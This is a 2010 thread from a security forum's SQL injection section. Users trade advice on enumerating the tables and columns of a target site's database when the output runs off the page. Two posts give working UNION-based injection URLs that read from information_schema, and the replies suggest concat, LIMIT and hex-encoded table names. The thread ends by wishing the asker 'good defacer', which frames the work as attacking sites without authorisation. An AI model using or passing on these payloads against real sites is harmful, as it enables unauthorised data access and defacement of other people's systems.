|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
table and column names run off page. |
|
Posted: Sun Nov 21, 2010 8:35 pm |
|
|
Despotic |
Active user |
|
|
Joined: Nov 17, 2010 |
Posts: 42 |
|
|
|
|
|
|
|
I've noticed that when injecting into sites (other then forums) my column and table names run off the page and the last few are unviewable.
how can I overcome this?
injection I'm using.
Code: | site.com/index.php?id=-47 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns-- |
|
|
|
|
|
Posted: Mon Nov 22, 2010 10:40 am |
|
|
vince213333 |
Advanced user |
|
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
|
|
|
|
Try using concat() instead of group_concat(), it sometimes places the outcome below each other. Otherwise you could try the LIMIT statement. |
|
|
|
|
Posted: Mon Nov 22, 2010 11:14 pm |
|
|
Despotic |
Active user |
|
|
Joined: Nov 17, 2010 |
Posts: 42 |
|
|
|
|
|
|
|
yep... limit statement works but I have to cycle through them 1 at a time. |
|
|
|
|
Posted: Tue Nov 23, 2010 11:27 am |
|
|
vince213333 |
Advanced user |
|
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
|
|
|
|
There might be an other way but I can't think of one atm :/ |
|
|
|
|
Posted: Wed Nov 24, 2010 11:11 am |
|
|
pink_spider |
Advanced user |
|
|
Joined: Aug 28, 2010 |
Posts: 91 |
|
|
|
|
|
|
|
Use the name of tabela in hexadecimal :
Code: | site.com/index.php?id=-47 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns where table_name=0x(name of table in hexadecimal)-- |
[b]Sophia Hacker Group cr3w |
|
|
|
|
Posted: Wed Nov 24, 2010 2:12 pm |
|
|
vince213333 |
Advanced user |
|
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
|
|
|
|
True, forgot that one |
|
|
|
|
Posted: Thu Nov 25, 2010 5:07 pm |
|
|
pink_spider |
Advanced user |
|
|
Joined: Aug 28, 2010 |
Posts: 91 |
|
|
|
|
|
|
|
yes. no problem!
good defacer to u (: |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|